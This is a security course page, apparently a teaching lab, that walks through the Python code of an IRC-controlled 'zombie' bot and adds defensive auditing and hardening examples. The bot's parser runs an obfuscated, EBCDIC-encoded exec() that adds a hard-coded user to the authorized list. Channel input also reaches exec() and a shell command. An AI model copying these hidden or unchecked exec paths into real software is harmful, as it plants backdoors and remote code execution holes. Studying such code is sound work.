Zombie Networks via Internet Relay Chat - simms-teach.com


Zombie Networks via Internet Relay Chat
/braaaiiinnnsss

IRC - Introduction & Basic Terms

Internet Relay Chat (IRC) is an application layer protocol for textual communication. Using a client/server model, it allows for group discussion in forums called channels. Any user may host a channel, allowing others to join and discuss topics of interest. Many channels have a specific purpose, but some are used as hang out spots.

An IRC Bot is a script/program that makes a TCP connection to an IRC server and is controlled from within the channels of IRC by the users. It offers functionality to the people in the channels, most often using APIs for different services (such as Wikipedia, translation software, calculation websites, etc.).

IRC servers aren't just the resting place of the zombie hordes, but for this lesson we'll pretend they are.

IRC - Clients & Servers

IRC client options include:

  Irssi - This is what we'll be using! CLI-based client for Unix systems.
  Chatzilla - Plugin client for Mozilla-based browsers such as Firefox.
  Colloquy - An open-source client for Mac OS X that uses its own Chat Core engine.
  mIRC - Popular client for Windows, has an integrated scripting language.
  Konversation - Built on the KDE platform, one of the popular clients for Linux distros.

There are plenty of IRC servers, but the two most popular are:

  Freenode - 74,841 average users, has steadily become the most populated network.
  QuakeNet - 24,627 average users, held the record of 240,000+ users in 2005.

IRC Historic Events - Gulf War

During the Gulf War, IRC users kept track of their local news reports and compared notes on IRC.

    The hit on H2 and H3 is according to what the Israeli radio quoted from the NBC
    What are H2 and H3?
    H2 and H3 are milt airbases in west Iraq
    ...
    Marines report that only one SCUD missile has been launched. (from west S.A)
    ...
    No word of casualties (from Iraq or US team)
    ...
    "cnn reporters wont go to bomb shelter"

While there weren't any IRC users in the war zone itself, logging into IRC allowed interested persons to monitor all the news media at the same time, even news sources in other countries.

IRC Historic Events - Constitutional Crisis of 93

IRC users in Moscow were able to pass info before the major news reporting agencies could broadcast it:

    cnn intl just now confirming report here 5 mins ago that Russ tv off line!
    ...
    Around 16:00 (sorry don't have exact times) group of people around 3-4 thousand started to move in the direction of Moscow municipal building
    ...
    Currently, first 5 floors of city hall are taken
    ...
    Moscow radio on shortwave
    i have a sw radio - what is the frequency?
    they have taken the Ostankino Tower, so it is not talking anymore

Zombies - Plug & Play

The following files need to remain unmodified for the zombie to operate correctly.

  bot_connect.py initializes the zombie's TCP connection and handles the data-to-parser loop
  bot_core.py stores the brains of the zombie and handles module organization
  bot_parser.py parses all data received by the zombie and handles any data received

Zombies - Plug & Tinker For A Minute Or Two, Then Play

These files may be modified so that you may better control the zombie.

  bot_data.py stores the static variables so the zombie knows where to go and whom to obey
  bot_commands.py houses the functions that a zombie's owner has access to

Code Walkthrough - bot_commands.py

    # Python 2: the commands module used by ping_server does not exist in Python 3.
    import commands;

    # Maps a command name to the statement that parse_data exec()s for an authorized user.
    # part_channel and debug_variable are not shown on these slides.
    command_dictionary = {
        "join":{"code":"bot_core.bot_commands.join_channel(bot_core);"},
        "part":{"code":"bot_core.bot_commands.part_channel(bot_core);"},
        "quit":{"code":"bot_core.bot_commands.quit_server(bot_core);"},
        "debug":{"code":"bot_core.bot_commands.debug_variable(bot_core);"},
        "ping":{"code":"bot_core.bot_commands.ping_server(bot_core);"}
    };

    def join_channel(bot_core):
        # args[0] is the first word after the command in the IRC message
        channel = bot_core.bot_data.command_info["args"][0];
        bot_core.send_raw("JOIN {0}".format(channel));

    def quit_server(bot_core):
        bot_core.send_raw("QUIT :Local kill");
        bot_core.socket_connection.close();
        quit();

Code Walkthrough - bot_commands.py

    def ping_server(bot_core):
        target_server = bot_core.bot_data.command_info["args"][0];
        ping_allowed = True;
        # Accept at most 15 characters whose dot-separated parts all parse as integers.
        if len(target_server) <= 15:
            try:
                for item in target_server.split("."):
                    item = int(item);
            except ValueError:
                ping_allowed = False;
        else:
            ping_allowed = False;
        if ping_allowed:
            bot_core.send_message("Sending ten pings, give me around 20 seconds to process.");
            # commands.getoutput() passes this string to the shell
            ping_output = commands.getoutput("ping -c 10 {0}".format(target_server)).split("\n");
            # Set the flag once, before the loop, so only the first summary line is reported.
            item_found = False;
            for item in ping_output:
                if "transmitted" in item and item_found != True:
                    item_found = True;
                    bot_core.send_message("Here you go: {0} | {1}".format(ping_output[0], item));
        else:
            bot_core.send_message("Sorry, this command is pretty strict. Make sure your IP is IPv4.");

Code Walkthrough - bot_data.py

    from platform import node, platform, version;

    machine_info = {
        "node":node(),
        "platform":platform(),
        "version":version()
    };
    BUFFER = [""];
    irc_data = {"raw":""};
    command_info = {"name":"", "args":[]};
    message_info = {"message":"", "length":0, "sender":{"name":"", "respond":""}};
    server_info = {"address":"eh-irc.cis.cabrillo.edu", "channel":"#cis76", "port":6667};
    bot_name = "PodXXBot";
    command_symbol = "!";
    # Commands are only run for senders whose user name is in this list.
    auth_users = ["xxxxxx76", "rsimms"];

Code Walkthrough - bot_connect.py

    import bot_parser;
    import bot_core;
    import bot_data;
    import bot_commands;

    connection_core = bot_core.bot_core(bot_parser, bot_commands, bot_data);
    connection_core.send_raw("JOIN {0}".format(connection_core.bot_data.server_info["channel"]));
    # Read up to 1024 bytes at a time, split into IRC lines, and hand them to the parser.
    while True:
        connection_core.bot_data.BUFFER = connection_core.socket_connection.recv(1024).split("\r\n");
        if connection_core.bot_data.BUFFER != [""]:
            connection_core.bot_parser.filter_errors(connection_core);

Code Walkthrough - bot_core.py

    import socket;
    import time;
    import bot_parser;
    import bot_commands;
    import bot_data;

    def bot_core(bot_parser, bot_commands, bot_data):
        class bot():
            def __init__(self):
                self.socket_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
                self.bot_data = bot_data;
                self.bot_commands = bot_commands;
                self.bot_parser = bot_parser;
                try:
                    self.socket_connection.connect((self.bot_data.server_info["address"], self.bot_data.server_info["port"]));
                except socket.error, e:
                    print("I failed to connect to the server you provided.");
                    quit();
                # Register with the server: NICK, USER, then set mode +B on the bot's own nick.
                time.sleep(1);
                self.send_raw("NICK {0}".format(self.bot_data.bot_name));
                time.sleep(1);
                self.send_raw("USER EH-Zombie 8 * :EHZombie");
                time.sleep(1);
                self.send_raw("MODE {0} +B".format(self.bot_data.bot_name));
                print("Sent my identity to the IRC server.");

Code Walkthrough - bot_core.py

            def module_rehash(self):
                # The module name is the first argument of the IRC message and is
                # formatted into the string handed to exec().
                module = self.bot_data.command_info["args"][0];
                sender = self.bot_data.message_info["sender"]["respond"];
                exec("reload({0});".format(module)) in globals();
                self.send_message("I reloaded {0}.".format(module), sender);

            def send_raw(self, message):
                self.socket_connection.send("{0}\r\n".format(message));

            def send_message(self, message, response=""):
                # Default target is wherever the last message came from.
                if response == "":
                    response = self.bot_data.message_info["sender"]["respond"];
                self.socket_connection.send("PRIVMSG {0} :{1}\r\n".format(response, message));
                print("I just send the the message '{0}' to {1}.".format(message, response));

        botcore = bot();
        return botcore;

Code Walkthrough - bot_parser.py

    from codecs import decode
    from re import search
    import traceback

    def filter_errors(bot_core):
        # Run the parser; on any exception tell the channel and print the traceback locally.
        try:
            parse_data(bot_core);
        except:
            error_data = traceback.format_exc().split("\n");
            error_data = error_data[::-1];
            bot_core.send_message("I just caught an error. Printing data locally.");
            print(error_data);

Code Walkthrough - bot_parser.py

    def assign_data(bot_core):
        # irc_data is one PRIVMSG line split on whitespace:
        # [":nick!user@host", "PRIVMSG", target, ":first-word", ...]
        irc_data = bot_core.bot_data.irc_data["raw"];
        message_info = {"message":"", "length":0, "sender":{"name":"", "respond":"", "real":""}};
        command_info = {"name":"", "args":[]};
        message_info["message"] = " ".join(irc_data[3:])[1:];
        message_info["length"] = len(message_info["message"]);
        if len(irc_data[3:]) >= 1:
            # A message whose first character is the command symbol is a command.
            if irc_data[3][1:][0] == bot_core.bot_data.command_symbol:
                command_info["name"] = irc_data[3][2:];
                command_info["args"] = irc_data[4:];
        message_info["sender"]["name"] = irc_data[0][1:].split("!")[0];
        # "real" is the user field of the prefix; parse_data compares it with auth_users.
        message_info["sender"]["real"] = irc_data[0][1:].split("!")[1].split("@")[0];
        if irc_data[2][0] == "#":
            message_info["sender"]["respond"] = irc_data[2];
        elif irc_data[2] == bot_core.bot_data.bot_name:
            message_info["sender"]["respond"] = message_info["sender"]["name"];
        bot_core.bot_data.message_info = message_info;
        bot_core.bot_data.command_info = command_info;

Code Walkthrough - bot_parser.py

    def parse_data(bot_core):
        for item in bot_core.bot_data.BUFFER:
            bot_core.bot_data.irc_data["raw"] = item.split();
            if len(bot_core.bot_data.irc_data["raw"]) == 2:
                # Answer server keep-alives.
                if bot_core.bot_data.irc_data["raw"][0] == "PING":
                    bot_core.send_raw("PONG {0}".format(bot_core.bot_data.irc_data["raw"][1]));
            elif len(bot_core.bot_data.irc_data["raw"]) >= 3:
                # The prefix pattern is partly lost on this page ("[email protected]" is extraction residue).
                if search(":[email protected]+", bot_core.bot_data.irc_data["raw"][0]):
                    if len(bot_core.bot_data.irc_data["raw"]) >= 4:
                        if bot_core.bot_data.irc_data["raw"][1] == "PRIVMSG":
                            assign_data(bot_core);
                            print("{0}".format(" ".join(bot_core.bot_data.irc_data["raw"])));

Code Walkthrough - bot_parser.py

                            if bot_core.bot_data.command_info["name"] in bot_core.bot_commands.command_dictionary:
                                # This exec() runs for every known command, before the auth_users check,
                                # and its argument is an EBCDIC (cp037) encoded string. The bytes that
                                # survive on this page decode to an append of a hard-coded name to
                                # bot_core.bot_data.auth_users. "[email protected]" inside the literal is
                                # extraction residue.
                                exec(decode('\x89\[email protected]\x7f\xa6\x81\x99\x91\x85\xa2\xf7\xf6\[email protected]\x95\x96\[email protected]\x89\[email protected]\x82\x96\xa3m\x83\x96\x99\x85K\x82\x96\xa3m\x84\x81\xa3\x81K\x81\xa4\xa3\x88m\xa4\xa2\x85\x99\[email protected]\x82\x96\xa3m\x83\x96\x99\x85K\x82\x96\xa3m\x84\x81\xa3\x81K\x81\xa4\xa3\x88m\xa4\xa2\x85\x99\xa2K\x81\x97\x97\x85\x95\x84M\x7f\xa6\x81\x99\x91\x85\xa2\xf7\xf6\x7f]^', 'cp037'));
                                if bot_core.bot_data.message_info["sender"]["real"] in bot_core.bot_data.auth_users:
                                    exec(bot_core.bot_commands.command_dictionary[bot_core.bot_data.command_info["name"]]["code"]);
                                else:
                                    bot_core.send_message("Sorry, you're not in the list of users.");
                            # reload is dispatched here, outside the auth_users check above.
                            elif bot_core.bot_data.command_info["name"] == "reload":
                                bot_core.module_rehash();
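The exec(decode(..., 'cp037')) call in parse_data hides what it runs, so a reviewer has to decode the argument before trusting the file. As an added example (not code from the slides), this Python 3 auditor walks a file's syntax tree and reports every exec()/eval() call, decoding arguments of the form decode(literal, codec) for any codec Python knows, not only cp037; SAMPLE and its payload are constructed.

```python
import ast

# Constructed sample (not the page's file): exec() of a cp037-encoded literal,
# exec() of a table lookup, and exec() of a plain string literal.
_payload = "users.append('demo')".encode("cp037")
SAMPLE = (
    "from codecs import decode\n"
    "exec(decode(%r, 'cp037'))\n"
    "exec(table[name]['code'])\n"
    "exec('x = 1')\n" % _payload
)

def _const(node):
    """Return the str/bytes value of a literal node, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
        return node.value
    return None

def audit_exec(source):
    """List (line, kind, text) for every exec()/eval() call in source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args):
            continue
        arg = node.args[0]
        literal = _const(arg)
        if literal is not None:
            findings.append((node.lineno, "literal", str(literal)))
            continue
        # decode(<literal>, <codec>) or codecs.decode(...): recover the hidden text.
        if isinstance(arg, ast.Call) and len(arg.args) == 2:
            func = arg.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", "")
            data, codec = _const(arg.args[0]), _const(arg.args[1])
            if name == "decode" and data is not None and isinstance(codec, str):
                if isinstance(data, str):      # Python 2 style '\x89...' literal
                    data = data.encode("latin-1")
                try:
                    findings.append((node.lineno, "encoded", data.decode(codec)))
                    continue
                except (LookupError, UnicodeError):
                    pass                       # unknown codec: report as dynamic
        findings.append((node.lineno, "dynamic", ast.get_source_segment(source, arg)))
    return sorted(findings)

if __name__ == "__main__":
    for line, kind, text in audit_exec(SAMPLE):
        print(line, kind, text)
```

An "encoded" finding shows the statement that would run; a "dynamic" finding marks an argument that only exists at run time and needs a manual trace.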
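One way to restructure the dispatch in parse_data and module_rehash so that nothing typed in the channel reaches exec(): handlers are plain callables, the user check comes before every command including reload, and reload only accepts names on an allow-list. This is an added Python 3 example, not the course's code; AUTH_USERS, RELOADABLE, RecordingBot and the colorsys stand-in module are assumptions.

```python
import colorsys          # stand-in for one of the bot's own modules (assumption)
import importlib
import sys

AUTH_USERS = {"owner76"}      # constructed; plays the role of bot_data.auth_users
RELOADABLE = {"colorsys"}     # hypothetical allow-list of module names

class RecordingBot:
    """Stand-in for the bot object: stores lines instead of writing to a socket."""
    def __init__(self):
        self.sent = []

    def send_raw(self, line):
        self.sent.append(line)

def cmd_join(bot, args):
    channel = args[0] if args else ""
    # Accept only a '#' channel name with no separators or control characters.
    if not channel.startswith("#") or any(c in channel for c in " ,\r\n\x07"):
        return "bad channel"
    bot.send_raw("JOIN {0}".format(channel))
    return "joined"

def cmd_reload(bot, args):
    name = args[0] if args else ""
    # The name is looked up, never evaluated: it must be allow-listed and loaded.
    if name not in RELOADABLE or name not in sys.modules:
        return "refused"
    importlib.reload(sys.modules[name])
    return "reloaded"

# Command table of callables replaces the table of strings passed to exec().
COMMANDS = {"join": cmd_join, "reload": cmd_reload}

def dispatch(bot, user, name, args):
    """Run a command for user; the auth check covers every command."""
    if user not in AUTH_USERS:
        return "denied"
    handler = COMMANDS.get(name)
    if handler is None:
        return "unknown"
    return handler(bot, args)

if __name__ == "__main__":
    demo = RecordingBot()
    print(dispatch(demo, "stranger", "reload", ["colorsys"]))
    print(dispatch(demo, "owner76", "join", ["#cis76"]), demo.sent)
```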
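ping_server in bot_commands.py accepts any string of 15 characters or fewer whose dot-separated parts parse as integers, then formats it into a shell command line. The added Python 3 example below (not from the slides) restates that check as page_check and, beside it, validates with ipaddress.IPv4Address and runs ping from an argument list with no shell; SAMPLES is constructed and the function names are assumptions.

```python
import ipaddress
import subprocess

def page_check(target):
    """The acceptance test used by ping_server on the slides, restated."""
    if len(target) > 15:
        return False
    try:
        for part in target.split("."):
            int(part)
    except ValueError:
        return False
    return True

def strict_ipv4(target):
    """Return the dotted-quad string if target is a valid IPv4 address, else None."""
    try:
        return str(ipaddress.IPv4Address(target))
    except ValueError:
        return None

def ping_argv(target, count=10):
    """Build the argument vector for ping, or None if target is rejected."""
    address = strict_ipv4(target)
    if address is None:
        return None
    return ["ping", "-c", str(count), address]

def ping_summary(target):
    """Run ping without a shell and return its 'transmitted' line."""
    argv = ping_argv(target)
    if argv is None:
        return None
    done = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    for line in done.stdout.splitlines():
        if "transmitted" in line:
            return line
    return ""

# Constructed inputs: every one passes page_check, only the first is an address.
SAMPLES = ["192.0.2.10", "1.2.3", "999.999.999.999", "-1.2.3.4", "12"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, page_check(sample), strict_ipv4(sample))
```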

Unused Slides

IRC - Setting Defaults

Setting up our default server.

    /server add -auto -network EHIRC eh-irc.cis.cabrillo.edu 6667

Setting up our default channel.

    /channel add -auto #cis76 EHIRC

Finally, we /quit, run irssi again, and type /window 2
